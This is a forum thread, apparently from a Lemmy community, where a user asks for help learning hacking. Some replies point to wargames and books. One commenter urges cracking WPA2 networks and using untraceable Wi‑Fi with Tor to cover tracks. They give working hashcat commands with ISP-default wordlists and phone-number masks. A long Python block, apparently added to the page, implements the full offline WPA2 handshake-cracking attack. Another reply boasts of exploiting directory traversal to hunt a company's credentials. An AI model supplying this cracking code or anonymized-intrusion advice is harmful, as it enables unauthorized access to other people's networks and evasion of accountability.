submitted 1 week ago by [email protected] to c/[email protected]

This may sound like fedposting, so feel free not to respond. I'm asking if people knowledgeable about cybersecurity, penetration testing, etc. could help me learn either through advice or more personal guidance. I'm familiar with Maia Crimew's blog post, but as with most of this stuff it's just vague enough to be difficult for me to push off from. I am really good with computers when using them as intended, but going off the beaten path and finding flaws or footholds is where I struggle. If you have advice or want to guide more closely, you can leave a comment here, a DM, or you can get me on Matrix @cupcake-of-spice:matrix.org

The site hackthebox dot com has battlegrounds with two teams hacking each other's virtual machines while hardening their own. If anyone wants to start a team for that, I'd be up for joining, though at my current state I may not be so much help...

top 9 comments
[-] [email protected] 8 points 1 week ago

From zero: pay attention to the news about it and see if you can do the stuff in the news. Like, see a cvss and try to pull it off. You don’t need anyone opposed to you, just see if you can mock up the heists you see in the news in your home.

The best way to understand something is by doing it.

[-] [email protected] 6 points 1 week ago

If you want a grounding in the basics of how computer exploits work, getting your hands on a copy of Hacking: The Art of Exploitation by Jon Erickson is a decent choice. It's an old book, and things have advanced significantly since then, but the stuff it goes over is still the core of how hacking actually works.

[-] [email protected] 3 points 1 week ago* (last edited 1 week ago)

There's no substitute for practice. Start doing these:

https://overthewire.org/wargames/

They have a nice difficulty progression, gentle enough to be effective but not too easy.

[-] [email protected] 3 points 1 week ago* (last edited 1 week ago)

They're a bit outdated, but I very much recommend the Syngress Stealing the Network book series. The first one is just kind of a bunch of short stories, but the later ones have an ongoing narrative. Lib as hell, but interesting and covers some great topics.

Funny story: back around when those books were released all the Syngress books had downloadable content and the Syngress website was using a download.php script that was vulnerable to Directory Traversal. I think I spent a full day or two manually downloading the majority of their website, browsing through scripts, looking for credentials.

Syngress also had some good books on spam and phishing now that I think about it.

[-] [email protected] 3 points 1 week ago

I just went back to Crimew's post and started looking at some of those.

[-] [email protected] 4 points 1 week ago

Word, I'm not familiar with Crimew but I think I just looked at the post you're referencing and there's some pretty good stuff mentioned. I cut my teeth on phrack back when it was still being passed around on BBSes. (There was an article in 43(?) on stealing a pbx that I got a real kick out of as a kid.) Google dorking is fun for basic exploits.

I would seriously recommend starting with understanding wifi hacking and then how Tor works and how to use it. Learn to anonymize yourself and cover your tracks before you do anything that needs it. Build yourself a pwnagotchi (or an esp32-based alt or a cheap pineapple), learn to use hashcat to crack wpa2 hashes, and then get on Tor from wifi you can't be tracked to. From there you can experiment with ways to bounce from random tor nodes to legit websites that are gonna block those nodes.

Keep in mind a lot of the open source mirrors for major websites, like invidious/xcancel, can serve as alternatives for the major corp websites when you're doing your research. Keep as much of your traffic in Tor as you can by using onion sites. Watch defcon and other conference talks for background in concepts that interest you.

Have fun!

[-] [email protected] 3 points 1 week ago

I've got some understanding of Tor. I've built a pwnagotchi in the past and used good ol' aircrack-ng, but always got stuck with a hash I can't crack. From what I've seen WPA2 doesn't go down easily. I have a lot of information, but not much in the way of organizing it usefully, though that's probably a symptom of having too little or too sparse information.

[-] [email protected] 2 points 1 week ago

Oh word. You're well on your way already. While there's plenty out there that can't be cracked in a reasonable time, I find that half the battle is knowing what to try based on the SSID format. Have you run across this table?

https://forums.hak5.org/topic/39403-table-of-wifi-password-standards/

For example, if spectrum is prevalent in your area, grab a copy of the spectrum-netgear wordlist.

https://github.com/andrewjlamarche/PSKracker/tree/master/dicts/netgear-spectrum

This will run through a combo of adjnoun and then 3 digits for each combo. Takes about an hour on a 1050 Ti.

hashcat.exe -m 2500 "C:\hashfile.pcap.hccapx" -a6 netgear-spectrum.txt ?d?d?d

I also always throw phone number combos of my local area codes at it. tbh, this is usually what does it if they've got a custom SSID.

hashcat.exe -m 2500 -a 3 -1 ?d "C:\hashfile.pcap.hccapx" 555?1?1?1?1?1?1?1

Honestly, I totally get it, I've got more fluff in my skull than brains. So it's very hard to keep in mind everything I should. I mostly just had some favorite techniques I relied on to do my basic exploration and then once I have a system I can set my sights on that's when I did research and built a plan of attack. I would say definitely check out those syngress books. In case I didn't express that well enough, they're basically hypothetical scenarios wrapped around actual techniques. Great for getting the juices flowing and thinking big picture and how different techniques can tie in to each other. Definitely read the hackback papers.

In minecraft, I would recommend really sitting down and thinking about what it is you're trying to do with these skills and then build up profiles of the types of organizations you would like to work with in the future. Check their job listings for software and hardware they use, try and build org charts to find out the people you would want to get in contact with, etc. From there, the jhaddix methodology is a great start. https://github.com/jhaddix/tbhm
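What the two hashcat commands above actually do, written out as an added example (this is not the commenter's code and not hashcat's): for every candidate passphrase, derive the PMK with PBKDF2-HMAC-SHA1 salted by the SSID, expand it to the PTK with the 802.11i PRF, take the KCK, and compare an HMAC-SHA1-128 MIC over the captured EAPOL message 2 with the MIC in the capture. The first candidate generator mirrors `-a 6 wordlist ?d?d?d` (word + three digits), the second mirrors `-a 3 -1 ?d 555?1?1?1?1?1?1?1` (area code + seven digits). Everything here is constructed so it runs offline: the three-word wordlist stands in for netgear-spectrum.txt, the MACs, nonces and EAPOL frame are made up, and the handshake MIC is computed from a chosen passphrase rather than captured. The `-m 2500`/`.hccapx` format in the commands still works, but current hashcat marks it deprecated and expects `-m 22000` with a `.hc22000` file from hcxpcapngtool.

```python
"""Offline WPA2-PSK check: candidate -> PMK -> PTK/KCK -> EAPOL MIC, compared
with the MIC from the 4-way handshake. Constructed example, no real capture."""
import hashlib
import hmac
import itertools
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt and the 4096 rounds are the cost: every guess pays
    ~8192 HMAC-SHA1 calls, which is why a good guess about the password
    format (from the SSID) matters more than raw GPU time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):  # 4 * 20 bytes >= 64 bytes of PTK
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2/AKM-PSK MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key frame
    with its own MIC field (bytes 81:97 in the frame built below) zeroed."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def check_candidate(candidate: str, hs: dict) -> bool:
    """True if `candidate` reproduces the handshake MIC (KCK = PTK[0:16])."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = prf_512(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def hybrid_wordlist_digits(words, digits: int = 3):
    """Equivalent of `-a 6 wordlist ?d?d?d`: each word, then every digit suffix."""
    for w in words:
        for suffix in itertools.product("0123456789", repeat=digits):
            yield w + "".join(suffix)


def mask_phone_numbers(area_code: str):
    """Equivalent of `-a 3 -1 ?d 555?1?1?1?1?1?1?1`: area code + 7 digits.
    Order here is itertools.product order (rightmost digit fastest), which is
    not a claim about hashcat's internal ordering."""
    for tail in itertools.product("0123456789", repeat=7):
        yield area_code + "".join(tail)


def crack(candidates, hs: dict, max_tries: int = 0):
    """Run candidates against the handshake; returns (passphrase or None, tries)."""
    n = 0
    for n, cand in enumerate(candidates, 1):
        if check_candidate(cand, hs):
            return cand, n
        if max_tries and n >= max_tries:
            break
    return None, n


def build_handshake(ssid: str, passphrase: str, ap_mac: bytes, sta_mac: bytes,
                    anonce: bytes, snonce: bytes) -> dict:
    """Constructed EAPOL-Key message 2 (WPA2, RSN IE for CCMP/PSK) whose MIC is
    computed the way a real station would, so there is something to crack."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # constructed RSN IE
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: HMAC-SHA1 MIC, pairwise, MIC set
            + b"\x00\x00"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, ID
            + bytes(16)                  # MIC field, zeroed for the HMAC
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body  # 802.1X v2, EAPOL-Key
    kck = prf_512(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": frame, "mic": eapol_mic(kck, frame)}


# Constructed stand-ins: tiny wordlist and made-up MACs/nonces, not a capture.
WORDLIST = ["brightlake", "calmsky", "quietriver"]
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
HS_SPECTRUM = build_handshake("NETGEAR42", "brightlake017", AP_MAC, STA_MAC,
                              bytes(range(32)), bytes(range(32, 64)))
HS_PHONE = build_handshake("MyHomeWiFi", "5550000009", AP_MAC, STA_MAC,
                           hashlib.sha256(b"anonce2").digest(), hashlib.sha256(b"snonce2").digest())


def demo():
    """Hybrid attack recovers the adjnoun+3-digit key; mask attack, capped at 50
    guesses here, recovers the phone-number key early in its 10^7 keyspace."""
    found1, tries1 = crack(hybrid_wordlist_digits(WORDLIST), HS_SPECTRUM)
    found2, tries2 = crack(mask_phone_numbers("555"), HS_PHONE, max_tries=50)
    return found1, tries1, found2, tries2


if __name__ == "__main__":
    print(demo())
```

The cost model is the thing to take away: each guess is one PBKDF2 (two 4096-round HMAC-SHA1 chains) plus four cheap HMACs, so the 10^7 phone-number mask is only practical because a GPU runs PBKDF2 in parallel, and a wordlist shaped by the SSID format (the Hak5 table above) cuts the keyspace by orders of magnitude before any hardware is involved.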

this post was submitted on 25 May 2025
15 points (100.0% liked)

askchapo
